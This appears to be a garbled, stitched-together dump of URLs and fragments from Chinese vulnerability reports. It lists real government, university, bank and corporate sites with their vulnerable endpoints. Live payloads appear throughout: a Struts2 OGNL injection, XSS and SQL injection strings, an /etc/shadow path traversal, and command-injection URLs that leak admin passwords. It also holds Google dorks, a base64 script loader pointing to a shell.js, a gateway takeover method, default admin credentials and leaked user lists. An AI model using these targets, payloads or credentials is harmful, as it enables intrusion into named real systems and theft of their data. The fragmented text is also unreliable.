http://222.221.250.20:18181/V2Conf/jsp/user/loginAction.do http://221.232.141.109/FCKeditor/editor/filemanager/connectors/uploadtest.html https://gouser.3g.net.cn/userManage/login.jsp?systemid=76 https://password.3g.net.cn/iisadmpwd/aexp2.asp http://hi.blog.sina.com.cn/blog/caogen/admin_bole_add.php?dpc=1&qq-pf-to=pcqq.group http://about.ifensi.com/news_info.php?id=38194 http://group.ifensi.com/admin.php http://www.tzsbbm.com/index.php?at=r http://www.tzsbbm.com/userinfo/user.php?act=edit&id= http://www.sciclife.com http://www.sciclife.com/manage/coffeesafe.jsp www.xxx.com/admin,demo地址:http://ktv.cms.bookinge.com/admin http://61.145.124.30:8080/ http://nf.shnap.net.cn/ http://oa.aqtc.edu.cn/jmx-console/ http://application.dodopal.com:9997/jmx-console/ http://221.226.86.248/login.action www.ycpai.com URL:http://112.64.239.234/C6/Jhsoft.Web.login/PassWord.aspx http://112.64.239.234/C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&Username=test http://g.qq.com/admin/ http://www.artword323.com http://www.wordtech.net http://www.yjbys.com/company/1229266.html 
http://ybtv.artword323.com:8012/login.aspx http://www.lzgzw.gov.cn/asp/1xx.asp?ID=10242 http://www.strongsoft.net/ http://www.mirapoint.com.cn/ http://www.nhfpc.gov.cn/fronttree/fronttree/getManuscriptsByChannelId_FrontTree.action(为什么会是这?因为web.xml里filter过滤的action指向没有防御二级或者三级目录) http://jwxt.tzpc.edu.cn/qmkscx_reg.asp http://jwgl.jhu.cn/qmkscx_reg.asp http://szitu.cn:86/qmkscx_reg.asp http://222.187.199.60/qmkscx_reg.asp http://jwcx.czie.net/qmkscx_reg.asp http://oadf114net.www.df114.net/login.php http://js.nclass.org/sc8/logon/userlogon.do http://livechat.dinodirect.com/ http://livechat.dinodirect.com/LiveChatServer/LiveChatMonitor.html?n=lujun&sln=jiankong&i=418&did=9&dname=%B1%B1%C3%C0%D2%BB%D7%E9&coid=1&pid=3&index=001001001&type=3&cgid=1 http://shop.youxinpai.com/Detail.aspx?serial=000048 http://ygxy.rsgis.whu.edu.cn/admin/user.add.php?userid=1&act=edit http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca http://www.thegitc.com/index.php/home/index/getPersonnelDetailed?id=5 http://112.124 http://112.124 http://112.124 http://112.124 index.php/Admin/Home/ http://www.szjrwl.com/ inurl:product.asp?class= http://www.dongli-robot.com/product.asp?class=53&classname=%BB%FA%C6%F7%C8%CB%B4%FA%C0%ED%C5%E4%CC%D7%BC%B0%BC%BC%CA%F5%D6%A7%B3%D6 http://www.szhaolong.net/cn/product.asp?class=27&classname=%B2%BB%D0%E2%B8%D6%B6%DB%BB%AF%CF%B5%C1%D0 http://www.kexingsz.com.cn/product.asp?class=2&classname=+%B5%AF%BB%C9%CE%E5%BD%F0%CA%D4%D1%E9%BB%FA http://www.lulinternational.com/tw/product.asp?class=223&classname=IGBT+DC1200V http://www.hyilight.com/product.asp?class=7&classname=LED%20%C2%B7%20%B5%C6 http://www.coko-tech.com/cn/product.asp?class=79&classname=MICRO5PIN%C4%B8%D7%F9%D7%AA%BD%D3%CD%B7 http://www.honghengmp.com/cn/product.asp?class=9&classname=%B1%AD%B5%E6/%B4%C5%D0%D4%B1%F9%CF%E4%CC%F9 http://www.spdl68.com/product.asp?class=3&classname=%B1%DA%B9%D2%B5%E7%D4%B4%CF%B5%CD%B3&mn_id=6374 
http://www.szbianse.com/cn/product.asp?class=21&classname=%D2%B9%B9%E2%B2%FA%C6%B7%D5%B9%CA%BE http://baisen.hk-web-2.szjrwl.com/cn/product.asp?class=29&key=&price1=&price2=&classname=%CC%EC%BB%A8%B5%C6&page=3§ion=1 http://www.cf-dz.com/product.asp?class=14&classname=VIMICRO%D6%D0%D0%C7%CE%A2 inurl:productshow.asp?id= http://www.coko-tech.com/cn/productshow.asp?id=112 http://www.kexingsz.com.cn/productshow.asp?id=407&mnid=6364&classname=+%CA%B3%C6%B7%C0%E0&uppage= http://www.dongli-robot.com/productshow.asp?id=131&mnid=6361&classname=%BB%FA%C6%F7%C8%CB%B4%FA%C0%ED%C5%E4%CC%D7%BC%B0%BC%BC%CA%F5%D6%A7%B3%D6 http://www.lulinternational.com/tw/productshow.asp?id=127 http://www.honghengmp.com/cn/productshow.asp?id=298 http://www.hyilight.com/productshow.asp?id=27&mnid=4869&classname=LED%CD%B6%B9%E2%B5%C6&uppage=product.asp http://www.spdl68.com/productshow.asp?id=67&mnid=6363&classname=%D6%D0%D1%EB%D0%C5%BA%C5%C6%C1 http://www.bjwj88.com/productshow.asp?id=3&mnid=4869&classname=%BA%CF%D2%B3&uppage=product.asp http://www.szbianse.com/cn/productshow.asp?id=38 http://www.cf-dz.com/productshow.asp?id=121 inurl:/gmis/ http://211.68.208.72/gmis_tjwgy/ http://yjsgl.zjtcm.net/gmis/ http://202.121.199.182:8080/gmis/ http://jcys.jxufe.cn:88/VJJxvw/liveAction.action admin:jcys2014 http://www.mastycp.com/List.asp?boardid=11 http://fjepca.com http://fjb.nea.gov.cn http://table.chinanews.com.cn/vote2008/view_results.php?si https://app.asana.com http://glxy.cuit.edu.cn/Databackup/wzws.asp http://api.91160.com http://125.39.130.18:28017/ http://www.gszlyy.com/detail.jsp?articleId=2175 http://www1.nepu.edu.cn/cg/login.aspx http://bbs.kuwo.cn/ http://gs.tju.edu.cn:80/yjspy/py2013/zy_list.asp?xydm=117 http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001【注入点】&serchStr=【注入点】 http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001&serchStr=%27+AND!%3d1+AND+%27a%27%3d%27a 
https://github.com/joybee007/acs/blob/42c709998b7655bbb22e1d6aa7ce8ce58ba453ac/service/mail.js http://wooyun.org/bugs/wooyun-2014-070878 http://www.ssbz.gov.cn/web/web_info_list.jsp?type=13&catalog=2 wyzx.ahu.edu.cn/list/page.jsp?id=ogf21ed9-jn06-fa5k-i703-b74hb35qmvqj&xxlx=10 http://www.jnrsks.gov.cn http://www.jnrsks.gov.cn/UpLoadFiles/Contents/ http://www.jnrsks.gov.cn/UpLoadFiles/Other/ http://www.threeoa.com/product/501.html www.jmsyz.net/eeoaftp/downloadFile.action www.zichang.sh.cn/eeoaftp/downloadFile.action www.sipras.net/eeoaftp/downloadFile.action www.mzlyz.cn/eeoaftp/downloadFile.action ssd3.31390.com/eeoaftp/downloadFile.action www.xiezhengyong.net/eeoaftp/downloadFile.action http://ejj.io/SOP.php http://threeoa.com/ inurl:space?blogId= http://www.threeoa.com/ http://www.hshsh.pudong-edu.sh.cn/ http://www.yk2z.ykedu.net/ http://www.zjyk2z.net/ http://58.217.106.249/ http://job.100tal.com/?systemjobtype=1 http://v.17173.com http://v.17173.com/u/118319704/playlist http://219.141.157.7/index.php/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%20ASC&p=1&price=6&rule_id=1 http://219.141.157.7/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%2520ASC%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28%27xss%27%29%3C/ScRiPt%3E&p=1&price=6&rule_id=9 http://219.141.157.7/index.php?a=order_list&delivery_idcard=e%22%20onmouseover%3dprompt%281%29%20bad%3d%22&m=order&order=e www.anzhi.com http://www.chinaamc.com.hk/portal/web.rar http://yanchi.hncdst.cn/read.asp?id=303 http://yanchi.hncdst.cn/read.asp?dl=便民信箱&xl=&id=19 http://www.hnlxkjj.gov.cn/read.asp?id=1401 http://jskj.hncdst.cn/read.asp?id=1836 http://yanchi.hncdst.cn/read.asp?id=303 http://guantouzui.hncdst.cn/read.asp?id=73 http://weixin.hncdst.cn/read.asp?id=132 http://hupingshan.hncdst.cn/read.asp?id=790 http://www.hncdst.cn/read.asp?id=5716 http://longtanqiao.hncdst.cn/read.asp?id=138 http://cdcxy.hncdst.cn/read.asp?dl=%BF%C6%BC%BC%B3%C9%B9%FB&id=1834 
http://dzj.hncdst.cn/read.asp?id=4507 http://wlkj.hncdst.cn/read.asp?id=1314 http://junshanpu.hncdst.cn/read.asp?id=73 http://junshanpu.hncdst.cn/read.asp?id=73 http://potou.hncdst.cn/read.asp?id=182 http://yazigang.hncdst.cn/read.asp?id=126 http://yougang.hncdst.cn/read.asp?id=120 http://datongshan.hncdst.cn/read.asp?id=76 http://cuijiaqiao.hncdst.cn/read.asp?id=309 http://sansheng.hncdst.cn/read.asp?id=64 http://xinxing.hncdst.cn/read.asp?id=117 http://moshi.hncdst.cn/read.asp?id=105 http://hncdst.cn/read.asp?id=5147 http://jiashan.hncdst.cn/read.asp?id=579 http://cdgxw.hncdst.cn/main/read.asp?id=2992 http://yijiadu.hncdst.cn/read.asp?id=21 http://baiyunshan.hncdst.cn/read.asp?id=186 http://zaoshi.hncdst.cn/read.asp?id=161 http://12396.hntyst.gov.cn/read.asp?id=1174 http://hupingshan.hncdst.cn/read.asp?id=160 http://www.haitiansoft.com:8080/ http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 http://demo.doctorcom.com/DrcomManager/download.jsp?filename=&filepath=/etc/shadow http://www.bzgh.gov.cn/disp.asp?id=2023 http://www.tjsfj.gov.cn/disp.asp?id=1936 http://www.bzdpf.org.cn/disp.asp?id=927 http://www.njsf.gov.cn/disp.asp?id=1237 http://njrsj.gotoip55.com/disp.asp?id=348 http://www.bzcjda.com/disp.asp?id=473 http://www.bsfxedu.com/disp.asp?id=341 http://bzqggzy.com/disp.asp?ID=619 http://www.bzqgt.gov.cn/disp.asp?id=4603 http://www.bzdpf.org.cn/disp.asp?ID=954 http://www.njgtzy.gov.cn/disp.asp?id=2780 http://www.bzsbj.gov.cn/disp.asp?id=1971 http://www.tjsfj.gov.cn/disp.asp?id=1874 http://sicav.chinaamc.com/admin_login.php http://shy.hpe.sh.cn https://drpaper.com.tw:10000/session_login.cgi http://74.125.227.77/#q=inurl:/session_login.cgi+++YouCloud+Mail&filter=0 http://mail.chinaums.com/cgi-bin/madmin.cgi https://gateway2.unionpay.com/cgi-bin/madmin.cgi https://mail.unionpay.com/cgi-bin/madmin.cgi http://mail.chinapay.com/cgi-bin/madmin.cgi 
ip:218.80.244.37) http://mail.cscb.cn/cgi-bin/madmin.cgi http://smkxxy.lcu.edu.cn/yanjiusheng/Admin/ad_index.html http://mail.bankofshanghai.com/cgi-bin/madmin.cgi http://www.ningzhi.net/nzcms/ http://www.hlwangkui.gov.cn/nzcms_show_news.asp?id=5740 http://www.lndz.com.cn/nzcms_show_news.asp?id=643 http://www.landwz.gov.cn/nzcms_show_news.asp?id=914 http://www.smlgbj.gov.cn/nzcms_show_news.asp?id=5436 http://www.lhtb.gov.cn/nzcms_show_news.asp?id=5894 http://www.sqsczx.com/nzcms_show_news.asp?id=59 http://video.ncu.edu.cn/nzcms_show_news.asp?id=4524 http://gjsw.hntbc.edu.cn/tx/nzcms_show_news.asp?id=3151 http://218.64.56.26/nzcms_show_news.asp?id=4554 http://61.190.13.55/nzcms_show_news.asp?id=5772 http://www.hlwangkui.gov.cn/nzcms_show_news.asp?id=7206 http://www.jnspzx-sd.gov.cn/ http://www.jnspzx-sd.gov.cn/site/Article_Classj.asp?ClassID=23 http://xy.sdkd.net.cn/xsdrs/ www.jlgrm.com,网站的标题是:华中师范大学外国语学院,校园网太渣,没能打开华师官网二级域名的那个外国语学院的网站,这网站应该不是仿冒的吧? http://www.ningzhi.net/nzcms/ http://www.lzsf.gov.cn/nzcms_list_news.asp?id=14&sort_id=13 http://www.landwz.gov.cn/nzcms_list_news.asp?id=818&sort_id=812 http://www.lhtb.gov.cn/nzcms_list_news.asp?id=622&sort_id=621 http://www.ycjtj.gov.cn/nzcms_list_news.asp?id=667&sort_id=656 http://www.qmsl.gov.cn/nzcms_list_news.asp?id=699&sort_id=663 http://www.hlwangkui.gov.cn/nzcms_list_news.asp?id=755&sort_id=663 http://www.snzhenba.jcy.gov.cn/nzcms_list_news.asp?id=692&sort_id=660 http://hgedu.gov.cn/nzcms_list_news.asp?id=716&sort_id=658 http://www.sqsczx.com/nzcms_list_news.asp?id=685&sort_id=720 http://www.jzgqt.org/nzcms_list_news.asp?id=699&sort_id=663 http://lpxtw.a224.xunbiz.net/nzcms_list_news.asp?id=697&sort_id=662 http://ggw.zjsm.com/nzcms_list_news.asp?id=674&sort_id=658 http://www.czzcb.cn/nzcms_list_news.asp?id=754&sort_id=638 http://www.dmxjyw.com/nzcms_list_news.asp?id=665&sort_id=656 http://tw.cztgi.edu.cn/nzcms_list_news.asp?id=706&sort_id=662 http://hbbxzx.com/nzcms_list_news.asp?id=680&sort_id=678 
http://www.wuhanbt.com.cn/whbt/nzcms_list_news.asp?typeid=4&id=6 http://www.bit-school.com/nzcms_list_news.asp?id=675&sort_id=658 http://www.dmxjyw.com/nzcms_list_news.asp?id=665&sort_id=656 http://www.czjccw.com/nzcms_list_news.asp?id=820&sort_id=818 http://www.gdmarketing.cn/nzcms_list_news.asp?id=713&sort_id=656 http://218.25.119.234:8888/oa/nzcms_list_news.asp?id=823&sort_id=821 http://www.xjgzd.com/nzcms_list_news.asp?id=710&sort_id=709 http://www.qmsl.gov.cn/nzcms_list_news.asp?id=699&sort_id=663 http://www.9ask.cn/ data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3NpdGUuY29tL3NoZWxsLmpzPjwvc2NyaXB0Pg== http://site.com/shell.js http://support.zte.com.cn/long.txt https://gisftp.lenovo.com/ wistronpic:x:920:100:Linux liujf1:x:527:100:Linux lizhia-01:x:541:100:Linux dinggang-preload-r:x:682:100:Linux jingxiang:x:956:100:Linux wistronbj:x:921:100:Linux wangam:x:904:100:Linux chensf1:x:1000:100:Linux lenovo-perf:x:1016:100:Linux software-dev-1:x:804:100:Linux software-dev-2:x:805:100:Linux software-dev-3:x:806:100:Linux software-dev-4:x:807:100:Linux software-dev-5:x:808:100:Linux software-dev-6:x:809:100:Linux yangjingj:x:572:100:Linux wangwei37:x:1008:100:Linux flex_hungary:x:876:100:Linux mujk:x:594:100:Linux liuming1:x:842:100:Linux zhaojing2-usi:x:879:100:Linux tt:x:734:100:Linux mayza-01:x:546:100:Linux ganly:x:596:100:Linux odm_zhougj1_1:x:977:100:Linux yangxfa:x:719:100:Linux shirl-r:x:792:100:Linux wangdb-r:x:732:100:Linux odm_zhougj1_2:x:978:100:Linux smi:x:969:100:Linux zhengsc:x:729:100:Linux jiazj-tpv:x:697:100:Linux liuming:x:581:100:Linux cdwg:x:739:100:Linux liujff:x:695:100:Linux wudma:x:982:100:Linux http://cos.sto.cn/wui/theme/ecology7/page/login.jsp http://wooyun.org/bugs/wooyun-2010-049265 http://www.ahnu.edu.cn/site/gra/Administrator/Admin_Login.asp链接进去,直接显示源代码,如图 http://www.wanda.cn/index.php?m=special&c=index&a=microfilm_info&id=211 http://ejj.io/SOP.php貌似手机打不开了,没关系,我们把他源码弄下来本地测试: 
http://192.168.10.70/SupeSite7.5_SC_UTF8/upload//admincp.php?action=database&op=importstart&do=import&datafile=./backup_OpVKpM/140928_0Idz28GO-1.sql https://eshop.htc.com/webapp/wcs/stores/servlet/OrderDetail?catalogId=10001&langId=-7&orderId=1755842&storeId=10001&orderStatusCode=C http://history.ynnu.edu.cn/phpMyAdmin/libraries/ http://history.ynnu.edu.cn/phpMyAdmin/ http://sics.ynnu.edu.cn/studylist.aspx?id=345 http://vod.ynnu.edu.cn/link.aspx?id=1 http://brewmp.sina.cn/index.php/reg/confirm http://ask.zhidao.189.cn/ URL:GET http://www.zj.10086.cn/4gcard/ http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4 http://www.trip8080.com/login/verifyLoginc.jspx?callback=showUserInfo&t=1411895477588&callback=jsonpcallback665 http://cduestc.cn/newgt/index.asp http://www.wajy.net/Login.action http://www.ttyoa.com/OA/RenLiZiYuan/HeTong/HeTong.jsp?nCurPage=1&OrderBy=HeTongMingCheng&HeTongMingCheng_CX=%A1%AF&ZhengJianBianHao_CX= http://www.ttyoa.com/OA/3g_CaiWuGuanLi/ZhiChu/Main.jsp http://www.ttyoa.com/OA/3g_LianXiRen/Main.jsp view-source:http://www.ttyoa.com/OA/3g_LianXiRen/Main.jsp http://www.ttyoa.com/OA/3g_CaiWuGuanLi/ZhiC http://www.ttyoa.com/OA/3g_Che/LB.jsp?nCurP http://www.ttyoa.com/Common/Js/UploadEx/do_download.jsp?UpLoadPath=DB&FileName=Upload_2014-09-28-0-26-30_wooyun.jsp http://www.ttyoa.com/DB/pload_2014-09-28-0-26-30_wooyun.jsp http://www.ttyoa.com/DB/Upload_2014-09-28-0-28-18_css.jsp http://www.swrmyy.com/WJ_pyzfhfzl/admin/login.asp admin:admin888 http://www.travel.citic.com/shipList.jsp?shipid=1660 https://wen.lu/search?site=&source=hp&q=%E2%80%9C%E4%B8%8B%E8%BD%BD%E8%BA%AB%E4%BB%BD%E8%AF%81%E8%AF%BB%E5%8D%A1%E5%99%A8%E5%AE%89%E8%A3%85%E5%8C%85%E2%80%9D&btnK=Google+%E6%90%9C%E7%B4%A2&gws_rd=ssl http://puglin.yy.gov.cn http://sport.uestc.edu.cn/case_show.asp?case_id=99 http://sport.uestc.edu.cn/admin/ewebeditor/admin_login.asp http://sport.uestc.edu.cn/admin/ewebeditor/db/ewebeditor.mdb http://gk.ytu.edu.cn/ http://58.214.27.195/Search/result.jsp 
http://www.xishan.net/Search/result.jsp http://mhzx.mhedu.sh.cn/mhzx/Search/result.jsp http://oa.dhssx.com/Search/result.jsp http://222.190.122.226:2080/webschool/Search/result.jsp http://www.whjksyxx.com/Search/result.jsp http://www.wxzzyey.com www.wxzzyey.com http://www.wxzzyey.com BSoftNew.svc/Login?username=156...省略...6&DevID=8...省略...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=p...省略...5&DevVer=4.2.2 BSoftNew.svc/UpdatePatientInfo?token=...省略...&personid=9...省略...2&userid=2...省略...8&DevID=8...省略...0&OS=2&isUpdateUserInfo=true&DevType=GT-I9128E&ClientVer...省略 BSoftNew.svc/UpdatePatientInfo?token=...省略...&personid=9...省略...2&userid=2...省略...5&DevID=8...省略...0&OS=2&isUpdateUserInfo=true&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun&DevVer=4.2.2...省略 https://wx.abchina.com/WXMessage/DebitBindingCardAct.ebf?openId=otDNot61p8xtIsYTTPX6Smr_tBwE http://dg.wowostar.com/ http://dg.wowostar.com/company.sql http://dg.wowostar.com/company_cms/ https://eshop.htc.com/webapp/wcs/stores/servlet/OrderDetail?catalogId=10001&langId=-7&orderId=******&storeId=10001&orderStatusCode=C http://cnc.025journal.com/Web/CommonPage.aspx?Id=1 http://seie.xhu.edu.cn http://ysxb.bcu.edu.cn:81/ys_website/ys_zsjy/ys_zsjy_index.php?id=5 http://ysxb.bcu.edu.cn:81/phpmyadmin/ http://xyb.cupl.edu.cn/Alumni_news.aspx?id=329 http://www1.deyang.gov.cn/fgw-new/TopicOneListPage.aspx?TopicID=1 inurl:web/indexmore.asp?leibie= http://www.gzysx.com:80/sx/web/web/web/indexmore.asp?leibie=%CA%B5%D1%E9%CA%B5%D1%B5%CA%D2%BC%F2%BD%E9 http://220.178.213.189/web/web/web/indexmore.asp?leibie=%B9%AB%B8%E6 http://www.gxevc.com:10333/web/web/web/indexmore.asp?leibie=%B9%AB%CE%C4%B7%A2%CB%CD http://125.67.64.233:81/web/web/web/indexmore.asp?leibie=%D0%C2%CE%C5%B1%A8%B5%C0 http://218.89.109.22/web/web/web/indexmore.asp?leibie=%CD%A8%D6%AA%B9%AB%B8%E6 http://www.xxoo.com/ckeditor/imageupload/tupianadd1.asp http://pinggu.hnfnu.edu.cn/list.php?id=3 http://www.xtfda.gov.cn/mm/newscodejs.asp?lm2=172 
http://midh.cneln.net/eln3_asp/index.do http://www.gyey.com/cn/BYysxxCX.aspx?id1=1&id2=1&id3=1 http://ask.zhidao.189.cn/ http://121.15.172.116/bbs.zip https://github.com/somli/gen-tables/blob/40904ce079b51442651964eeea6106c9ee40f121/env/development.php URL:http://it.11185.cn/chinapostintegrate/mailqueries.a https://wen.lu/search?site=&source=hp&q=%E2%80%9C%E4%B8%8B%E8%BD%BD%E8%BA%AB%E4%BB%BD%E8%AF%81%E8%AF%BB%E5%8D%A1%E5%99%A8%E5%AE%89%E8%A3%85%E5%8C%85%E2%80%9D&btnK=Google+%E6%90%9C%E7%B4%A2&gws_rd=ssl http://www.cfgc.com.cn/hy_index/notify.asp?password=&chknum=&Radiochk=%CA%C7&Radiochk=%B7%F1&UKeySerial=&Digest=&SN_SERAL=&username=1* http://www.cfgc.com.cn/hy_index/notify.asp?pass http://jifen.jiajiaoban.com/admin/users/login http://zwfw.jiangxi.gov.cn:9080/online/sysmng/xxoo.jsp http://payonline.qcn.com.cn/UI/business/suggest/suggestdetail.jsp?id=561 http://m.ch999.com/productxinde.aspx?ppid=24019&proid=99999999 http://cupdate.client.189.cn/client.tar.gz http://jipiao.11185.cn/news/newsid!NewsById.a http://diy.11185.cn/DIYMXP/system/MMZH.do http://movie.11185.cn/index.a http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515 http://gd.10086.cn/shadu/)。上一个sql漏洞发现之前在 http://gd.10086.cn/shadu/kvweb/help/askQuestion.jsp http://120.197.231.114:8070/shaduhoutai/login.jsp http://daq.cn/html/user/register.html http://211.151.82.170/page.asp?typeid=1&id=18 inurl:ch/first_menu.aspx http://jse.tju.edu.cn/ch/reader/query_recent_article_list.aspx http://www.cssm.com.cn/ch/reader/query_recent_article_list.aspx http://www.joconline.com.cn/ch/reader/query_recent_article_list.aspx http://webvote.hangzhou.com.cn/mx/bm.php未做任何过滤直接上传PHP马 www.daoxila.com http://www.zjtj.org/zt_list.aspx?id=3&page=1 http://www.zjtj.org/hits.ashx?id=2441 http://qd.daoxila.com/hotel/all-image?id=1201 http://qd.daoxila.com/hotel/all-image?id=1201 
http://101.227.8.73/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://www.zjhz.cn/ http://www.hzwjls.com/cpinfo.asp?productsort=1&id=13 http://www.hzylfz.com/cpinfo.asp?productsort=1&id=22 http://www.hz-hg.cn/cpinfo.asp?id=149 http://www.ruiyangchemical.com/cpinfo.asp?id=13 http://hzhiger.com/cpinfo.asp?productsort=9&id=88 http://hz-zhiguan.com/cpinfo.asp?productsort=34&id=55 http://www.hz-mingda.com/cpinfo.asp?productsort=6&id=6 http://www.hzmelux.com/cpinfo.asp?productsort=7&id=129 http://www.hzxj.com/cpinfo.asp?productsort=2&id=12 http://www.mm-jixie.com/cpinfo.asp?productsort=20&id=215 http://www.hzshjx.com/cpinfo.asp?id=67 http://www.bx-hardware.com/cpinfo.asp?id=244 http://www.dadazipper.com/cpinfo.asp?productsort=8&id=619 http://www.hzjdjd.com/cpinfo.asp?productsort=3&id=72 http://www.hztlsilk.com/old/cpinfo.asp?productsort=6&id=58 http://www.hzmiaoda.com/cpinfo.asp?productsort=59&id=317 http://www.hzhiger.com/cpinfo.asp?productsort=7&id=193 http://www.hz-zhiguan.com/cpinfo.asp?productsort=23&id=37 http://www.hzylfz.com/cpinfo.asp?productsort=1&id=26 http://www.hzjdjd.com/cpinfo.asp?productsort=1&id=312 http://220.181.116.154/framework/global/login.jsp?source=index http://220.181.116.154/base/permission/cache/cacheInfoIndex.action WebSite:http://nmg.wo.com.cn/index.action http://www.gzhbw.gov.cn/web.rar https://s.huobi.com/?a=do_buy http://xtj.dajie.com/wx/xtj/109/referee/join?type=3&uid=30131111 http://www.ssap.com.cn/skwx/periodical/Period_annualCont.aspx?qik_id=20130527175674 http://202.118.65.18:9090/ http://www.yxcms.net/ http://demo.yxcms.net/index.html 
http://jwtz.ndrc.gov.cn/jwtz-ex/index.action encap:Ethernet FB:DA:59:80 addr:192.168.60.12 Bcast:192.168.60.255 Mask:255.255.255.0 fbff:feda:5980/64 Scope:Link MTU:1500 packets:23002286 packets:28848661 txqueuelen:1000 http://www.scett.bnu.edu.cn/NewsList.aspx?first=self_examination&second=tongzhifabu&page=1 http://www.scett.bnu.edu.cn/News.aspx?first=xinxizhongxin&second=xueyuangonggao&id=2196 http://www.scett.bnu.edu.cn/Channel.aspx?first=aboutus http://mail.tj.ct10000.com http://mail.cnbg.net/webmail/getPass.php?email=10000@mail.tj.ct10000.com&update=s http://wooyun.org/bugs/wooyun-2010-061859 http://www.junfang.com.cn/bigSortProduct.asp?bigid=180 http://www.junfang.com.cn/productShow1.asp?id=1292 http://www.junfang.com.cn/newsshow.asp?newsID=114 http://www.junfang.com.cn/bigSortProduct.asp?bigid=180 http://www.mgc.ac.cn/ http://www.mgc.ac.cn/cgi-bin/VFs/compvfs.cgi?Genus=Mycobacterium www.qycn.com http://www.wdghy.com/wdghyhd/register2.jsp?type=1 http://www.wdghy.com/wdghyhd/uploadfile.jsp?method=goFileUpload&fileType=jpg&maxSize=5&eleid=businesslicense&abc=0.18216927155681018 http://www.vans-china.cn http://220.***.***.*4/jisuanjiedian.html http://***.letv.com/ http://115.***.***.1*/ http://115.***.***.*7:8080/login http://115.***.***.1*/login http://115.1***.***3.1*:8080/ http://115.1***.***.*9/login.action http://115.1***.***2.*7/ http://sts.gzsti.gov.cn/Map.aspx?Big=5 http://sts.gzsti.gov.cn/Display.aspx?TID=01 http://sts.gzsti.gov.cn/Display.aspx?TID=01 http://sqlmap.org http://rccsh.sxu.edu.cn/newsbook.asp?classid=76&newsid=681 http://rccsh.sxu.edu.cn/class.asp?classid=69 http://rccsh.sxu.edu.cn/picshow.asp?id=262 http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://101.78.142.10/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://218.253.245.125/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount http://59.149.83.240/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount 
http://113.255.93.243cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount https://members.qidian.com.tw/apps/login.php http://www.cqjcy.gov.cn/rmjd/EmailToSuperVion.asp?id=2112 http://www.sdggcyfw.com/news/newscontent.aspx?id=9758 http://218.94.17.130:8002/download/ http://218.94.17.130:8002/download/%e5%88%9b%e6%96%b0%e7%bb%84%e4%b8%93%e7%94%a8/%e6%9c%b1%e7%8e%89%e5%86%9b%e7%a6%bb%e8%81%8c%e4%ba%a4%e6%8e%a5/D%e7%9b%98%e9%a1%b9%e7%9b%ae/%e9%a1%b9%e7%9b%ae/ http://218.94.17.130:8002/download/%e5%88%9b%e6%96%b0%e7%bb%84%e4%b8%93%e7%94%a8/%e6%9c%b1%e7%8e%89%e5%86%9b%e7%a6%bb%e8%81%8c%e4%ba%a4%e6%8e%a5/ http://bar.2144.cn/user/register这个链接下注册却需要填写邮箱 http://game.news.cn/shouyou/game_details.jsp?gameid=33582 http://210.13.199.11/ http://kfxsy.nchu.edu.cn:88/newsdetails.aspx?NewsId=20 http://www.hnrku.net.cn/kszx/NewsList.aspx?lbid=1210 http://www.hnrku.net.cn/jjjc/gly/admin/BoardView.asp?id=40 http://www.ehome10000.com http://www.ehome10000.com/SQISoft/Web/CustCenterPurchaseOrder.aspx http://suining.ehome10000.com/SQISoft/Web/CustCenterPurchaseOrder.aspx http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=1308201407032511&type=1 http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=1309300928106175&type=1 http://www.e***.net/airticket/policyOrder!details.shtml?operate=edit&ddbh=130125190937562&type=1 http://www.e***.net/airticket/reportAll/salesReportAll.jsp?cggy=2 http://sjc.sqc.edu.cn/manage/news-manage!newslist.action http://60.171.18.27/teachweb/WebFormResetPassword.aspx http://202.198.0.40:7925/teachweb/WebFormResetPassword.aspx http://sdjw.syu.edu.cn/WebFormResetPassword.aspx http://jwc.nchu.edu.cn/teachweb/WebFormResetPassword.aspx http://ice.sqc.edu.cn/admin/default.asp http://hr.snda.com/wintalent3/SNDA/web/index http://cmc.ncepu.edu.cn/showequpic.asp?id=83 http://cmc.ncepu.edu.cn/huan.asp?id=17 http://cmc.ncepu.edu.cn/showshuoming.asp?id=5 http://cmc.ncepu.edu.cn/equipments.asp?leibie=&page=2 
